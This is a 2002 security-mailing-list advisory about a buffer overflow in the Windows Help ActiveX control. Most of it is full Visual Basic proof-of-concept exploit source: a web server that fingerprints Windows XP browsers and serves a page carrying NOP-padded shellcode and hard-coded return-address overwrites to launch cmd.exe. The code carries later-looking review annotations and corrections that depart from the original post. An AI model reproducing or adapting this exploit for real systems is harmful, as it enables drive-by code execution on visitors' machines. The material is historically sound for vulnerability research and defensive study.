[EXPL] Windows Help Buffer Overflow PoC

From: support@securiteam.com
Date: 10/07/02


From: support@securiteam.com
To: list@securiteam.com
Date: 7 Oct 2002 08:44:06 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Windows Help Buffer Overflow PoC
------------------------------------------------------------------------

SUMMARY

As we reported in our previous article,
<http://www.securiteam.com/windowsntfocus/6X006155PU.html> Unchecked
Buffer in Windows Help Facility Could Enable Code Execution, an attacker
can make the Windows Help ActiveX control (hhctrl.ocx) execute arbitrary
code by supplying it with an arbitrarily long string. The following
proof-of-concept exploit code is a small Visual Basic web server that
fingerprints the connecting browser's User-Agent and is structured so that
it could serve a different payload per operating system; as published,
however, it only carries return addresses for Windows XP (kernel
5.1.2600.0), and clients reporting any other Windows version receive no
response at all. It can be used to check whether a system is still
vulnerable, but a successful run launches cmd.exe and crashes Internet
Explorer on the client, so it should only be pointed at test systems you
are authorised to attack.

DETAILS

Exploit:
This exploit should start a local cmd.exe (not a remote shell) on Microsoft
Windows XP, kernel version 5.1.2600.0, by triggering the Windows Help buffer
overflow through an <OBJECT> tag that loads hhctrl.ocx with an oversized
Item1 parameter. The hard-coded EBP/EIP values and the absolute address
embedded in the shellcode are specific to that build, so the code will not
work unmodified on the other affected Windows versions.

The entire Visual Basic project can be found at
<http://whiteroof.netfirms.com/ChmOverflow.zip> (a 2002 link that may no
longer be available). Only Module1.bas and the code section of Form1.frm
are reproduced below; the form's designer header, which defines the
control array `tcp` (evidently a Winsock control), the text boxes `Text1`
and `Text2`, and the button `Command1`, is not included. Long statements
have also been wrapped by the mailing-list software; rejoin them (or add
VB `_` line continuations) before compiling.
 
------------------------
Module1.bas
-----------------------
Attribute VB_Name = "Module1"
' Module-level state shared between Module1 and Form1.
' Form1 sets EBP/EIP for the fingerprinted client and then calls
' Buildin_The_BuFFer, which fills the remaining variables; Form1 reads
' Html_Page, Buffer, ShellCodeFrst and ShellCode to write the HTTP response
' and to log the payload sizes.
Public NbSck As Integer          ' index of the most recently loaded tcp() element
Public EIP As Variant            ' 4 bytes that overwrite the saved return address
Public EBP As Variant            ' 4 bytes that land in the saved EBP slot
Public Buffer As Variant         ' complete overflow string placed in the Item1 PARAM
Public ShellCodeFrst As Variant  ' "x.chm" + short stub that jumps into ShellCode
Public ShellCode As Variant      ' NOP-padded cmd.exe launcher
Public Html_Page As Variant      ' HTML page embedding the hhctrl.ocx OBJECT
 
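Public Sub Buildin_The_BuFFer()
' Builds the overflow string and the HTML page that delivers it.
'
' Layout of Buffer (positions matter):
'   "x.chm" + 14 NOPs + ShellCodeFrst stub (5 bytes) + 15 NOPs
'   + 349 NOPs + ShellCode launcher (49 bytes) + 350 NOPs
'   + EBP (4) + EIP (4) + `">`
'
' The stub (add edi,46 / jmp edi) relays control into the launcher; the
' original author notes that ShellCode is reached with EDI pointing at it.
' The launcher starts a LOCAL cmd.exe (not a remote shell) and then crashes
' IE; the author credits a paper by David Litchfield for it.
'
' The padding lengths are NOT arbitrary: they place EBP/EIP at the exact
' stack offsets for Windows XP kernel 5.1.2600.0, and the absolute address
' baked into the launcher (mov eax,77C28044h) is build-specific as well, so
' this PoC only works on that build.  The other versions listed as affected
' (Windows 98, 98 SE, ME, NT 4.0, NT 4.0 TSE, 2000) need their own padding
' and addresses.
'
' Inputs:  EBP, EIP (globals, 4 bytes each) - set by the caller first.
' Outputs: ShellCodeFrst, ShellCode, Buffer, Html_Page (globals).
'
' NOTE(review): bytes >= &H80 travel through VB Strings and the Winsock
' control as ANSI characters; the round trip is only byte-exact on a
' Western (1252) system code page.  Build from a Byte array if this ever
' has to run on another locale.
'
' Original author: sylvain.descoteaux@sympatico.ca
    Const NOP As Byte = &H90
    Dim stub As String
    Dim launcher As String

    ' --- first stage: 83 C7 2E = add edi,46 ; FF E7 = jmp edi ---
    stub = BytesToString(&H83, &HC7, &H2E, &HFF, &HE7)
    ShellCodeFrst = "x.chm" & String(14, Chr(NOP)) & stub & String(15, Chr(NOP))

    ' --- second stage: write "cmd.exe" on the stack, call a fixed address ---
    launcher = BytesToString(&H8B, &HEC)                            ' mov  ebp,esp
    launcher = launcher & BytesToString(&H33, &HFF)                 ' xor  edi,edi
    launcher = launcher & BytesToString(&H57)                       ' push edi      (zero dword; its top byte is the NUL after "cmd.exe")
    launcher = launcher & BytesToString(&H83, &HEC, &H4)            ' sub  esp,4    (room for the 7-char string)
    launcher = launcher & BytesToString(&HC6, &H45, &HF8, &H63)     ' mov  byte ptr [ebp-8],'c'
    launcher = launcher & BytesToString(&HC6, &H45, &HF9, &H6D)     ' mov  byte ptr [ebp-7],'m'
    launcher = launcher & BytesToString(&HC6, &H45, &HFA, &H64)     ' mov  byte ptr [ebp-6],'d'
    launcher = launcher & BytesToString(&HC6, &H45, &HFB, &H2E)     ' mov  byte ptr [ebp-5],'.'
    launcher = launcher & BytesToString(&HC6, &H45, &HFC, &H65)     ' mov  byte ptr [ebp-4],'e'
    launcher = launcher & BytesToString(&HC6, &H45, &HFD, &H78)     ' mov  byte ptr [ebp-3],'x'
    launcher = launcher & BytesToString(&HC6, &H45, &HFE, &H65)     ' mov  byte ptr [ebp-2],'e'
    launcher = launcher & BytesToString(&HB8, &H44, &H80, &HC2, &H77) ' mov eax,77C28044h - presumably kernel32!WinExec on this exact build; confirm
    launcher = launcher & BytesToString(&H50)                       ' push eax      (ends up at [ebp-0Ch], also becomes the callee's 2nd argument)
    launcher = launcher & BytesToString(&H8D, &H45, &HF8)           ' lea  eax,[ebp-8]
    launcher = launcher & BytesToString(&H50)                       ' push eax      (-> "cmd.exe", the callee's 1st argument)
    launcher = launcher & BytesToString(&HFF, &H55, &HF4)           ' call dword ptr [ebp-0Ch]
    ShellCode = String(349, Chr(NOP)) & launcher & String(350, Chr(NOP))

    ' --- the overflow string; the trailing `">` closes the PARAM value attribute ---
    Buffer = ShellCodeFrst & ShellCode & EBP & EIP & """>"

    ' --- HTML page: HTML Help control fed an oversized Item1, fired via HHClick() ---
    Html_Page = "<OBJECT id=weurg type=""application/x-oleobject""" & vbCrLf
    Html_Page = Html_Page & "classid=""clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11""" & vbCrLf
    Html_Page = Html_Page & "codebase=""file:hhctrl.ocx#Version=4,0,0,24""" & vbCrLf
    Html_Page = Html_Page & "width=80" & vbCrLf
    Html_Page = Html_Page & "height=20>" & vbCrLf
    Html_Page = Html_Page & "<PARAM name=""Command"" value=""Related Topics, MENU"">" & vbCrLf
    Html_Page = Html_Page & "<PARAM name=""Item1""" & vbCrLf
    Html_Page = Html_Page & "value=""EN_CHANGE;c:\" & Buffer & vbCrLf
    Html_Page = Html_Page & "</OBJECT>" & vbCrLf
    Html_Page = Html_Page & "<script>weurg.HHclick()</script>" & vbCrLf
End Sub

' Concatenates the given byte values (0-255) into a String, one ANSI
' character per byte - the same result as the original Chr()+Chr() chains,
' but readable and commentable one instruction at a time.
Private Function BytesToString(ParamArray bytes() As Variant) As String
    Dim k As Long
    Dim s As String
    For k = LBound(bytes) To UBound(bytes)
        s = s & Chr(bytes(k))
    Next k
    BytesToString = s
End Function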
------------------------- module1.bas --------------------------
 
------- FORM1.FRM -----
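Private Sub Command1_Click()
' Starts listening for the victim browser on the port typed into Text2.
' The listener is tcp(NbSck); tcp_ConnectionRequest loads a new element of
' the control array for every accepted client.
    Dim port As Long

    ' The original assigned Text2 straight to LocalPort, which raises an
    ' unhandled type-mismatch error for non-numeric input.  Validate first
    ' so the user gets a message in the log instead of a crash.
    If Not IsNumeric(Text2.Text) Then
        Text1.Text = "Port must be a number (1-65535)." & vbCrLf
        Exit Sub
    End If
    port = CLng(Val(Text2.Text))
    If port < 1 Or port > 65535 Then
        Text1.Text = "Port must be between 1 and 65535." & vbCrLf
        Exit Sub
    End If

    NbSck = NbSck + 1
    Load tcp(NbSck)
    tcp(NbSck).LocalPort = port
    tcp(NbSck).Listen

    Text1.Text = "Listening on port " & Text2.Text & vbCrLf & "------------" & vbCrLf
    Command1.Enabled = False   ' one listener per run
End Sub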
 
Private Sub Form_Load()
' Reset the tcp() control-array counter.  Every later Load tcp(NbSck) uses
' the next index; presumably tcp(0) is the design-time element (the .frm
' header is not part of the listing - confirm).
    NbSck = 0
End Sub
 
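Private Sub tcp_ConnectionRequest(Index As Integer, ByVal requestID As Long)
' Accepts an incoming connection on a freshly loaded element of the tcp()
' control array.  Index identifies the socket that raised the event (the
' listener); the client is always accepted on the new element, never on
' Index, so the listener stays free for the next browser.
'
' NOTE(review): nothing in this form ever Unloads an accepted element, so
' every client permanently consumes one array slot for the life of the run.
    Dim accepted As Integer

    On Error GoTo Fail
    accepted = NbSck + 1
    Load tcp(accepted)
    NbSck = accepted            ' advance only once the element really exists
    tcp(accepted).Accept requestID
    Exit Sub

Fail:
    ' The original used On Error Resume Next, which silently dropped a client
    ' whenever Load or Accept failed.  Report it instead of pretending the
    ' client was served.
    Text1.Text = Text1.Text & "Accept failed on socket " & accepted & ": " & Err.Description & vbCrLf
End Sub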
 
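Private Sub tcp_DataArrival(Index As Integer, ByVal bytesTotal As Long)
' Reads whatever the client sent, fingerprints it, and - for Windows XP
' clients only - answers with the exploit page built by Buildin_The_BuFFer.
'
' Fingerprinting: the raw request is appended to Text1 and the WHOLE log is
' searched for "indows NT 5.1" (the User-Agent token IE sends on XP).
' Searching the log rather than this chunk lets a request split over
' several DataArrival events still match, but the match is then not tied
' to the connection identified by Index.  The marker is a spoofable
' User-Agent substring, not a real OS check, and no HTTP parsing is done:
' any TCP client that sends the substring gets the payload.
'
' Only the XP (kernel 5.1.2600.0) EBP/EIP values are known; every other
' client gets no response and is left hanging on the open socket.  Adding a
' target means adding another marker/EBP/EIP branch here.
'
' NOTE(review): the advertised Content-Length is Len(Buffer)+10000, far
' larger than the page.  Together with Connection: Keep-Alive this
' presumably keeps IE waiting on the socket so the page (and the HHClick()
' script in it) is not torn down early - confirm before "fixing" it.
    Const XP_MARKER As String = "indows NT 5.1"
    Const SCK_CONNECTED As Integer = 7       ' MSWinsock sckConnected

    Dim Data As String
    Dim Send_It As Boolean

    tcp(Index).GetData Data
    Text1.Text = Text1.Text & Data
    Send_It = False

    If InStr(Text1.Text, XP_MARKER) > 0 Then
        Text1.Text = "Client: " & tcp(Index).RemoteHostIP & vbCrLf & _
                     "Windows Version: NT 5.1" & vbCrLf & _
                     "-----------------------------"
        ' Saved-EBP / saved-EIP overwrite for Windows XP kernel 5.1.2600.0,
        ' little-endian.  EIP = 0x0013C854 per the original comment -
        ' presumably a stack address inside the NOP padding; confirm.
        EBP = Chr(19) & Chr(216) & Chr(36) & Chr(17)
        EIP = Chr(84) & Chr(200) & Chr(19) & Chr(0)
        Buildin_The_BuFFer
        Send_It = True
    End If

    If Send_It Then
        If tcp(Index).State = SCK_CONNECTED Then
            ' The original emitted a bare CRLF before the status line, which is
            ' not valid HTTP/1.1 (IE tolerated it); the status line now comes
            ' first.  Str() is kept so the numbers carry the same leading space
            ' as before.  The Date header is static and harmless.
            tcp(Index).SendData "HTTP/1.1 200 OK" & vbCrLf
            tcp(Index).SendData "Content-Length: " & Str(Len(Buffer) + 10000) & vbCrLf
            tcp(Index).SendData "Server: Evil." & vbCrLf
            tcp(Index).SendData "Date: Thu, 03 Oct 2002 17:57:10 GMT" & vbCrLf
            tcp(Index).SendData "Content-Type: text/html" & vbCrLf
            tcp(Index).SendData "Connection: Keep-Alive" & vbCrLf
            tcp(Index).SendData vbCrLf
            tcp(Index).SendData Html_Page

            Text1.Text = Text1.Text & vbCrLf & "buffer has been sent to " & tcp(Index).RemoteHostIP & vbCrLf
            Text1.Text = Text1.Text & "Buffer Size Was: " & Str(Len(Buffer)) & " bytes." & vbCrLf
            Text1.Text = Text1.Text & "First ShellCode size was: " & Str(Len(ShellCodeFrst)) & " bytes." & vbCrLf
            Text1.Text = Text1.Text & "Shellcode Size was: " & Str(Len(ShellCode)) & " bytes." & vbCrLf
        End If
    End If
End Sub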
 
Private Sub Text1_DblClick()
' Double-clicking the log box clears it.
    Text1.Text = vbNullString
End Sub
--------------------- FORM1.FRM--------------------------------

ADDITIONAL INFORMATION

The information has been provided by
<mailto:sylvain.descoteaux@sympatico.ca> Sylvain.


DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


